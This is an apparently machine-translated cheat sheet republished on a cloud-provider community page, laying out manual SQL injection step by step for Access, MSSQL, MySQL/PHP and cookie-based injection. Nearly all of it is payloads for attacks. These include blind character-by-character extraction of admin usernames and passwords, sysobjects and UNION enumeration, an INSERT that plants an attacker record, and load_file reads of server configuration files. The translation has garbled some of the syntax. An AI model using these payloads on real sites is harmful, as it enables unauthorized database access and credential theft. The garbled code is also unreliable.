SQL Manual Injection Summary

Source: Internet
Author: User
Tags mssql

The first step is to get the IE menu + tools =>internet options = + advanced + Show friendly HTTP error message before the tick is removed. Otherwise, IE will only appear as an HTTP 500 server error, and no more prompts will be available, regardless of what error the server returns.

Digital type: And 1=1 and 1=2 determine if there is an injection
Character type: ' and ' 1 ' = ' 1 ' and ' 1 ' = ' 2
Search type: keyword% ' and 1=1 and '% ' = '% keyword% ' and 1=2 and '% ' = '%

IIS is used in case of error:
and User>0 (judging by Access or MSSQL)

Without error, use the respective database features to determine
and (select COUNT (*) from msysobjects) >0 (returns insufficient Access database)
and (select COUNT (*) from sysobjects) >0 (return to normal MSSQL database)

and Db_name () >0 (returns the database name)
and 0<> (SELECT @ @version)--(judging version information)
and Db_name () >0 (returns the database name)

Note: The first to find the background address before the solution, or white busy **********
Access injection:

Guess the name of the table (normally there is admin, abnormal does not exist)
and exists (SELECT * from [admin])
and (Select Count (*) from Admin) >0

Solver field: (the field username exists is normal, not normal does not exist)
and (Select username from Admin) >0
and exists (select username from [admin])

Guess the user name and password length
and (select top 1 len (username) from Admin) >0
and (select top 1 len (password) from Admin) >0
Principle: If the top 1 username length is greater than 0, then the condition is set up, then >1, >2, >3 This test, until the condition is not established, such as &GT;4, >5 is not set up, is Len (username) = 5, That is, the user name length is 5. After getting the length of the username, use mid (username,n,1) to intercept the nth character, and then ASC (Mid (username,n,1)) to get the ASCII code.

Guess the user
and (select top 1 ASC (mid username,1,1) from Admin) >0,1,2 ...,
When input to 109, an error is displayed, and 108 is displayed correctly, stating that the first character's ASCII code is 109., the first character to get is M.
Similarly and (select top 1 ASC (Mid (username,2,1) from Admin) >0,1,2 ...
By 114, the ASCII value of the second character is 114, and the character is R.
Note that the ASCII code in English and numbers is between 1-128 ...



MSSQL Injection:

Having 1=1--"burst a table name and field, such as: Column ' users.id ' is not valid in the select list"
GROUP BY Users.id have 1=1--
Group by Users.id, Users.username, Users.password, Users.privs have 1=1--
; Insert into users values (666, Attacker, Foobar, 0xFFFF)--"Insert new record"

Guess the table name:
Every database in SQL Server has user tables and system tables, and in system table sysobjects, each object created within the database (constraints, defaults, logs, rules, stored procedures, and so on) occupies a row in the sysobjects table. This means that the table name of the current database will exist within that table. We used to have three parameters, name (the name of the data table), Xtype (The Data table type U is the user table), ID (the object flag of the data table).
and (select top 1 name from sysobjects where xtype= ' u ') >0 (Gets the first table name: for example, user)
and (select top 1 name from sysobjects where xtype= ' u ' and name is not in (' user ')) >0 get the second table name, followed by and so on:

Guess the column name:
Using the system's own 2 functions col_name () and object_id (), the format of Col_name () is "col_name (table_id, column_id)", the parameter table_id is the identification number of the table, Column_ ID is the identification number of the column, object_id (admin) is to get the admin in sysobjects identification number, column_id=1,2,3 indicates the admin of the first-in-one column.
and (select top 1 col_name (object_id (' admin '), 1) from sysobjects) >0 "Get the first column name of the admin field" username "and so on, and get the" password "" ID And so on

To guess the contents of a field:
and (select top 1 username from [admin]) >0 "Get user name directly"
and (select top 1 password from [admin]) >0 "Get password directly"

Union union query:
Select Name,password,id from the user union select User,pwd,uid from table name
and 1=1 Union Select 1,2,3,4,5 ... From table name (numeric value starting from 1 slowly plus, if add to 5 return to normal, there are 5 fields)

ASCII verbatim decoding method:

1. Guess the length of the solution column
and (select top 1 len (column name) from table name) >n
where n is a number, the value of this n is converted to the length of the solution, and when n is 6 correct and 7 error, the length is 7.
Guess the second record should be used: Select top 1 len (column name) from table name where column name not in (selecttop 1 column name from table name)

2. Guess the user and password
The ASC () function and the Mid function, ASC (Mid (column name, n,1)) get the "column name" nth-character ASCII code
The Guess statement is: and (select top 1 ASC (Mid (field)) from database name) &GT;ASCII code
Interval Judgment statement: ..... between......and ...
Chinese processing: When ASCII is converted to "negative" use the ABS () function to take the absolute value.
Example: and (select top 1 ABS (ASC (field, top)) from database name) =ASC code

The application of ASCII verbatim decoding method:
1. Guess the table name: and (select COUNT (*) from admin) <>0
2. Guess the column name: and (select COUNT (column name) from table name) <>0
3, guess the number of users: and (select COUNT (*) from the table name) >1,2. 2 Normal, 3 errors, with 3 records in the table.
4. Guess the length of the user name: and (select Len (column name) from table name) >=1, >=2, >=3, >=4.
5. Guess the user name: and (select COUNT (*) from table name where (ASC (column name, Max)) between and130) <>0
Last Commit: and (select ASC (Mid (column name, max)) from table name =ascii value
6, guess the password of the administrator:
According to the above principle, the above statement (ASC (column name, 1, 1) of the column name to password will be able to get the password.


mysql+php Injection:
1. Determine if there is an injection, add '; and 1=1; and 1=2
2. Determine version and Ord (Mid (Version (), plus)) >51/* Return normal description is 4.0 or higher, you can use union query
3. Using the order by storm field, add Order by10/* After the URL if the return normal Description field is greater than 10
4. Use union again to query the exact field, such as: and 1=2union Select,......./* To return to normal, indicating the number of exact fields guessed. If you filter the space can be replaced with/**/.
5. Determine if the database connection account has write permissions, and (select COUNT (*) frommysql.user) >0/* If the result returns an error, then we can only guess the administrator account and password.
6. If you return to normal, you can 1=2 union Select1,2,3,4,5,6,load_file (char (ASCII value of the file path, separated by commas), 8,9,10/* Note: Load_file (char ( The ASCII value of the file path, separated by commas) can also be used in hexadecimal to read the configuration file, locate the database connection, and so on.
7. First guess the user table, such as: and 1=2 Union select 1,2,3,4,5,6 .... From user/* If it returns to normal, the table exists.
8. Know the table on the Guess field, and 1=2 Union select 1,username,3,4,5,6....from user/* if the field content is displayed in the 2 field there are some fields.
9. Similarly, guess the password field again.

Oracle+asp Injection:

Http://www.freebuf.com/articles/web/5411.html


Cookie injection:

Conditions: Id=request ("ID"), (the Web server is to fetch the data in the GET, no, then take the data in the post, not to fetch the data in the cookie); Cookies are not filtered, which results in a cookie injection.
If you collect data using Request.QueryString or Request.Form, it is impossible to use cookies to inject ******

Determine if there is a cookie injection

Example: http://www.xxx.com/1.asp?id=44
The input http://www.xxx.com/1.asp is not displayed properly because there are no parameters to lose.

Javascript:alert (document.cookie= "id=" +escape ("And1=1"), refresh the page, display normal, you can try the next step (if not normal, there may also be filtered)
Javascript:alert (document.cookie= "id=" +escape ("and1=2"), refresh the page, if not normal display, this indicates that there is an injection.

Length of the guessing solution:
Javascript:alert (document.cookie= "id=" +escape ("Selectlen (password) from admin) =16")
What to guess:
Javascript:alert (document.cookie= "id=" +escape ("Selectasc (Mid (username)) from admin) =97")


PHP Injection:

Judgment injection point: '; and 1=1 '; and 1=2
Judge Union:andord (Mid (Version (), >51)) and return correctly 4.0 available union queries
Use ORDER by storm field: ORDER by N (n=1,2,3.) (when n is 3 correct, 4 error is, 3 fields)
Use Union to query exact fields: and 1=1 unionselect,....... (when returned to normal, it means the number of guessed exact fields = last number)
Determine if the database connection account has Write permissions: and (select COUNT (*) frommysql.user) >0 (if you return an error, we will guess the administrator's account password, if returned to normal, you can
and 1=2 Union Select 1,2,3,4,5,6, Load_file (char (ASCII value of the file path, separated by commas), 8,9,10 [Note: Load_file (char (ASCII value of the file path, separated by commas)) The configuration file can also be read in hexadecimal, in this way])
Guess table: and 1=2 Union select 1,2,3,4,5,6 .... From user (back to normal, indicating existence of this table)
Guess field: and 1=2 Union select 1,username,3,4,5,6 .... Fromuser (in the same way, replace yourself if there are some fields if the field content is displayed in the 2 field)
Similarly, guess the password field again.

SQL Manual Injection Summary

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.